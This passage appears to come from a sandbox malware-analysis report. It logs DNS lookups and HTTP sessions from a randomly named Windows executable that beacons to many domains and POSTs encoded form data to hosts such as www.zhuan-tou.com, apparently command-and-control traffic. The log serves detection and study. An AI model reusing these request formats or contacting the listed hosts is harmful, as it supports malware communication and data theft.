                                                      Aug 18, 2024 18:27:09.313900948 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:09.314070940 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:09.316066027 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:09.316356897 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:10.035109997 CEST5414980192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:10.041671038 CEST805414976.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.055531025 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.060589075 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.064821959 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.067992926 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.073295116 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524272919 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524342060 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:11.524512053 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.544930935 CEST5415080192.168.2.976.223.67.189
                                                      Aug 18, 2024 18:27:11.549698114 CEST805415076.223.67.189192.168.2.9
                                                      Aug 18, 2024 18:27:25.128078938 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.133033037 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:25.133285046 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.135858059 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:25.141717911 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:26.642647028 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:26.692092896 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:27.662348986 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.668653965 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:27.673480034 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.675473928 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:27.683855057 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:29.189423084 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:29.236022949 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.208553076 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.219846010 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.219921112 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.222593069 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:30.227719069 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:30.227755070 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:31.736326933 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:31.784240961 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:32.755820990 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.760878086 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:32.760993004 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.762904882 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:32.767898083 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:46.512161016 CEST8054151116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:46.516706944 CEST5415180192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:49.093353033 CEST8054152116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:49.095045090 CEST5415280192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:51.603302002 CEST8054153116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:51.603377104 CEST5415380192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.135464907 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:54.136691093 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.137547016 CEST5415480192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:54.142442942 CEST8054154116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:59.671720028 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.677953959 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:27:59.678047895 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.680413008 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:27:59.690181971 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:01.299489021 CEST5415580192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:01.348026991 CEST8054155116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:02.318007946 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.322930098 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:02.323009014 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.324917078 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:02.329765081 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:03.830528021 CEST5415680192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:03.976406097 CEST8054156116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.474469900 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.479509115 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.479609966 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.481605053 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:06.486584902 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:06.486711979 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:07.986583948 CEST5415780192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:08.035990953 CEST8054157116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:09.004992962 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.010077000 CEST8054158116.213.43.190192.168.2.9
                                                      Aug 18, 2024 18:28:09.010175943 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.012103081 CEST5415880192.168.2.9116.213.43.190
                                                      Aug 18, 2024 18:28:09.017554045 CEST8054158116.213.43.190192.168.2.9
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Aug 18, 2024 18:24:17.118055105 CEST  53  51102  1.1.1.1  192.168.2.9
Aug 18, 2024 18:24:30.618527889 CEST  53  64410  162.159.36.2  192.168.2.9
Aug 18, 2024 18:24:31.101943970 CEST  57979  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:24:31.109342098 CEST  53  57979  1.1.1.1  192.168.2.9
Aug 18, 2024 18:24:39.842888117 CEST  56951  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:24:40.017956018 CEST  53  56951  1.1.1.1  192.168.2.9
Aug 18, 2024 18:24:56.584642887 CEST  51066  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:24:57.105564117 CEST  53  51066  1.1.1.1  192.168.2.9
Aug 18, 2024 18:25:10.618598938 CEST  50269  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:25:10.826087952 CEST  53  50269  1.1.1.1  192.168.2.9
Aug 18, 2024 18:25:24.145337105 CEST  57620  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:25:24.229363918 CEST  53  57620  1.1.1.1  192.168.2.9
Aug 18, 2024 18:25:38.255548954 CEST  56139  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:25:38.343326092 CEST  53  56139  1.1.1.1  192.168.2.9
Aug 18, 2024 18:25:51.646842003 CEST  64823  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:25:51.663258076 CEST  53  64823  1.1.1.1  192.168.2.9
Aug 18, 2024 18:26:08.475060940 CEST  49715  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:26:08.495548010 CEST  53  49715  1.1.1.1  192.168.2.9
Aug 18, 2024 18:26:21.787889957 CEST  51944  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:26:21.985690117 CEST  53  51944  1.1.1.1  192.168.2.9
Aug 18, 2024 18:26:35.209125996 CEST  63841  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:26:35.615653038 CEST  53  63841  1.1.1.1  192.168.2.9
Aug 18, 2024 18:26:49.428118944 CEST  63701  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:26:49.976648092 CEST  53  63701  1.1.1.1  192.168.2.9
Aug 18, 2024 18:27:03.337238073 CEST  49239  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:27:03.350264072 CEST  53  49239  1.1.1.1  192.168.2.9
Aug 18, 2024 18:27:16.559000015 CEST  53867  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:27:16.590339899 CEST  53  53867  1.1.1.1  192.168.2.9
Aug 18, 2024 18:27:24.647752047 CEST  49797  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:27:25.124953032 CEST  53  49797  1.1.1.1  192.168.2.9
Aug 18, 2024 18:27:59.147308111 CEST  61806  53  192.168.2.9  1.1.1.1
Aug 18, 2024 18:27:59.668601036 CEST  53  61806  1.1.1.1  192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 18, 2024 18:24:31.101943970 CEST | 192.168.2.9 | 1.1.1.1 | 0x664 | Standard query (0) | 56.126.166.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Aug 18, 2024 18:24:39.842888117 CEST | 192.168.2.9 | 1.1.1.1 | 0x4d5f | Standard query (0) | www.stemfiniti.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:24:56.584642887 CEST | 192.168.2.9 | 1.1.1.1 | 0x2053 | Standard query (0) | www.zhuan-tou.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:10.618598938 CEST | 192.168.2.9 | 1.1.1.1 | 0x1fc | Standard query (0) | www.lecoinsa.net | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:24.145337105 CEST | 192.168.2.9 | 1.1.1.1 | 0xd8e4 | Standard query (0) | www.8xbe578.app | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:38.255548954 CEST | 192.168.2.9 | 1.1.1.1 | 0xaadd | Standard query (0) | www.synergon.space | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:51.646842003 CEST | 192.168.2.9 | 1.1.1.1 | 0xf2ff | Standard query (0) | www.alanbeanart.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:08.475060940 CEST | 192.168.2.9 | 1.1.1.1 | 0xa559 | Standard query (0) | www.kacotae.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:21.787889957 CEST | 192.168.2.9 | 1.1.1.1 | 0xf778 | Standard query (0) | www.slushcafe.top | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.209125996 CEST | 192.168.2.9 | 1.1.1.1 | 0xef6f | Standard query (0) | www.a9jcpf.top | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:49.428118944 CEST | 192.168.2.9 | 1.1.1.1 | 0x112 | Standard query (0) | www.tqfabxah.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:03.337238073 CEST | 192.168.2.9 | 1.1.1.1 | 0xf90e | Standard query (0) | www.rtrpodcast.online | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:16.559000015 CEST | 192.168.2.9 | 1.1.1.1 | 0xbbba | Standard query (0) | www.winkthree.com | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:24.647752047 CEST | 192.168.2.9 | 1.1.1.1 | 0xb62 | Standard query (0) | www.mqmsqkw.lol | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:59.147308111 CEST | 192.168.2.9 | 1.1.1.1 | 0x69ae | Standard query (0) | www.lfghtko.lol | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 18, 2024 18:24:31.109342098 CEST | 1.1.1.1 | 192.168.2.9 | 0x664 | Name error (3) | 56.126.166.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Aug 18, 2024 18:24:40.017956018 CEST | 1.1.1.1 | 192.168.2.9 | 0x4d5f | No error (0) | www.stemfiniti.com | stemfiniti.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:24:40.017956018 CEST | 1.1.1.1 | 192.168.2.9 | 0x4d5f | No error (0) | stemfiniti.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:24:40.017956018 CEST | 1.1.1.1 | 192.168.2.9 | 0x4d5f | No error (0) | stemfiniti.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:24:57.105564117 CEST | 1.1.1.1 | 192.168.2.9 | 0x2053 | No error (0) | www.zhuan-tou.com | | 38.12.1.29 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:10.826087952 CEST | 1.1.1.1 | 192.168.2.9 | 0x1fc | No error (0) | www.lecoinsa.net | | 217.116.0.191 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:24.229363918 CEST | 1.1.1.1 | 192.168.2.9 | 0xd8e4 | No error (0) | www.8xbe578.app | 8xbe578.app | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:25:24.229363918 CEST | 1.1.1.1 | 192.168.2.9 | 0xd8e4 | No error (0) | 8xbe578.app | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:24.229363918 CEST | 1.1.1.1 | 192.168.2.9 | 0xd8e4 | No error (0) | 8xbe578.app | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:38.343326092 CEST | 1.1.1.1 | 192.168.2.9 | 0xaadd | No error (0) | www.synergon.space | synergon.space | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:25:38.343326092 CEST | 1.1.1.1 | 192.168.2.9 | 0xaadd | No error (0) | synergon.space | | 109.95.158.127 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:51.663258076 CEST | 1.1.1.1 | 192.168.2.9 | 0xf2ff | No error (0) | www.alanbeanart.com | alanbeanart.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:25:51.663258076 CEST | 1.1.1.1 | 192.168.2.9 | 0xf2ff | No error (0) | alanbeanart.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:25:51.663258076 CEST | 1.1.1.1 | 192.168.2.9 | 0xf2ff | No error (0) | alanbeanart.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:08.495548010 CEST | 1.1.1.1 | 192.168.2.9 | 0xa559 | No error (0) | www.kacotae.com | | 64.226.69.42 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:21.985690117 CEST | 1.1.1.1 | 192.168.2.9 | 0xf778 | No error (0) | www.slushcafe.top | | 203.161.55.102 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | www.a9jcpf.top | kmdne.ajunsdfancsda.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | kmdne.ajunsdfancsda.com | | 216.83.33.145 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | kmdne.ajunsdfancsda.com | | 216.83.33.141 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | kmdne.ajunsdfancsda.com | | 216.83.33.189 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | kmdne.ajunsdfancsda.com | | 216.83.33.143 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:35.615653038 CEST | 1.1.1.1 | 192.168.2.9 | 0xef6f | No error (0) | kmdne.ajunsdfancsda.com | | 216.83.33.140 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:26:49.976648092 CEST | 1.1.1.1 | 192.168.2.9 | 0x112 | No error (0) | www.tqfabxah.com | | 35.241.42.217 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:03.350264072 CEST | 1.1.1.1 | 192.168.2.9 | 0xf90e | No error (0) | www.rtrpodcast.online | rtrpodcast.online | | CNAME (Canonical name) | IN (0x0001) | false
Aug 18, 2024 18:27:03.350264072 CEST | 1.1.1.1 | 192.168.2.9 | 0xf90e | No error (0) | rtrpodcast.online | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:03.350264072 CEST | 1.1.1.1 | 192.168.2.9 | 0xf90e | No error (0) | rtrpodcast.online | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:16.590339899 CEST | 1.1.1.1 | 192.168.2.9 | 0xbbba | Name error (3) | www.winkthree.com | none | none | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:25.124953032 CEST | 1.1.1.1 | 192.168.2.9 | 0xb62 | No error (0) | www.mqmsqkw.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
Aug 18, 2024 18:27:59.668601036 CEST | 1.1.1.1 | 192.168.2.9 | 0x69ae | No error (0) | www.lfghtko.lol | | 116.213.43.190 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 54110 | 3.33.130.190 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:24:40.033992052 CEST | 440 | OUT | GET /toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.stemfiniti.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Aug 18, 2024 18:24:41.453566074 CEST | 394 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:24:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 54111 | 38.12.1.29 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:24:57.118403912 CEST | 698 | OUT | POST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzrbMmrToTQ0JNkpZkTRBhlDDYq6uZj
Aug 18, 2024 18:24:57.999445915 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:24:57 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 54112 | 38.12.1.29 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:24:59.653018951 CEST | 722 | OUT | POST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1oYL9mHFI39TGL13IhLDWNMB8N/wsd/OsODzNTqwCjHbx8LZO9H/VfKVG6aM52GCg9G0OnzUX2lNFR7AFg/uxo5G7XSVmQyKXdVbZu44grocjJkS7JVlKygX+K0XprCiZVfjYENAzo+WUYN9JQLfg8aCm8h8aFMaUcy2fS7gA==
Aug 18, 2024 18:25:00.535697937 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 54113 | 38.12.1.29 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:25:02.183993101 CEST | 1735 | OUT | POST /pjmu/ HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.zhuan-tou.com
                                                      Referer: http://www.zhuan-tou.com/pjmu/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1QYLPeHErP9SGL10IhODWNrB8V7wsRvOqSDzoPqggLHSx8LQu9ahlf6VGrdM4GGCg9G0PXzXCKlPFR8WVgN/BodG7PCVmUIKm9Vb5e49W/oQjJmV7JNlPqvX+WWXpfkia1fi9xtc3Y9IlEKyqw5SmsKEWA48KtxNXdf88P0/RAazCuZFVv374BfGb/qKOCR0WJkNyTCnhSguhLmTYtFopUrawgUN1hqoEW05EmZ0zw/776d2Z6ABei8AiJ7KkAN5mw13vmL/lxMy823EW1yB6d1YkzFpdwo1c3EXE/Os4qhPXbOcNvS/d1z//rrNvR0qjdNZp2pIgT89dZwVQ775BaMZe9tm3ZTKiLZ+qLF9pPOCd2E1vlgGIn+QQR6Lh20+U2z++ymv+EMI13PPH1SKK+9gIe2dM5QSs56/Dqy+d23MVXDFmVACbyFMapQjzaWRLUfSlmRbs5W0KZEpo+u6B96MoIdhHMdJLMLRXmT1vqkmLPuXlmn0OrloqNlwBw3M+TmzGttEL4i+YFF4Fw4DV8mSUxU+DD/eR77r29apBQN0E8Jx0Q3wdlMdnFmNKHVEpfQinYusB99BVsZGN5aopdP6OvzrXpOy5oI8tQyd7AfA19u4MiDf5NZIYYiXaKHIaruh1LmdHrR8n4G1g8ajw9HFGpKCEPueQhZowPf7GEC6OFaEfBueRFgNv8RiRpIGdMFyLJQm/MAcwze38HtW3qNbSHsPJElm/wjzLwLcj1CGS0meclzhD0TuLTwkZ1bs376wj83Wy1P0VJEv7psuLwUvP6aSMTbjVC4U9Ivwc4+nd3beQbZxLTiNKGHg+zXzJeHEP4wsS+vQPFJJeBEYNlKW7LdovwAIG69ujyRslBq/RcBdhbVgsPDfi7tPe36dq28xTsBcRv75FyprbL/samykPaoOMO0x9s8VhKUuBSGbnFQOhTlZgFcduOAJRodOnBTELQS [TRUNCATED]
Aug 18, 2024 18:25:03.084317923 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 54114 | 38.12.1.29 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:25:04.718010902 CEST | 439 | OUT | GET /pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.zhuan-tou.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
Aug 18, 2024 18:25:05.596633911 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sun, 18 Aug 2024 16:25:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
